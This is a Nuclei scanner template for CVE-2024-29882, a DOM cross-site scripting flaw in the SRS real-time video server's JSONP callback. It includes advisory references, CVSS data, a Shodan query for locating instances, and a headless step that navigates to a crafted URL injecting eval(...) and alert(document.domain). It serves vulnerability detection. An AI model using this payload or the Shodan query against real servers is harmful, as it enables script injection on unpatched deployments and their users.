SRS is a simple, high-efficiency, real-time video server. SRS's `/api/v1/vhosts/vid-<id>?callback=<payload>` endpoint didn't filter the callback function name which led to injecting malicious javascript payloads and executing XSS ( Cross-Site Scripting). This vulnerability is fixed in 5.0.210 and 6.0.121.
PoC代码[已公开]
id: CVE-2024-29882
info:
name: HTTP API DOM - XSS on JSONP callback
author: rootxharsh,iamnoooob,pdresearch
severity: high
description: |
SRS is a simple, high-efficiency, real-time video server. SRS's `/api/v1/vhosts/vid-<id>?callback=<payload>` endpoint didn't filter the callback function name which led to injecting malicious javascript payloads and executing XSS ( Cross-Site Scripting). This vulnerability is fixed in 5.0.210 and 6.0.121.
reference:
- https://github.com/ossrs/srs/commit/244ce7bc013a0b805274a65132a2980680ba6b9d
- https://github.com/ossrs/srs/security/advisories/GHSA-gv9r-qcjc-5hj7
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score: 7.2
cve-id: CVE-2024-29882
cwe-id: CWE-79
epss-score: 0.02716
epss-percentile: 0.85414
metadata:
verified: true
max-request: 1
vendor: ossrs
product: simple_realtime_server
shodan-query: http.favicon.hash:1386054408
tags: cve,cve2023,srs,dom,xss
headless:
- steps:
- args:
url: '{{BaseURL}}/console/en_index.html?alert(document.domain)#/vhosts/vid-xsedfv%3Fcallback=eval(unescape(location.search.slice(1)))%252f%252f'
action: navigate
- action: waitdialog
name: object_dom
matchers-condition: and
matchers:
- type: dsl
dsl:
- object_dom == true
- type: word
part: body
words:
- "<title>SRS"
- "ConnectSRS</a>"
condition: or
case-insensitive: true
# digest: 490a0046304402202e003070b1c9970607cd51b2018200c88ec1b8376067993759144ebaa6cce5f90220400d5f3df82aacc49a3a07ba03f1cc01a49143444f65d2e436694394987d0431:922c64590222798bb761d5b6d8e72950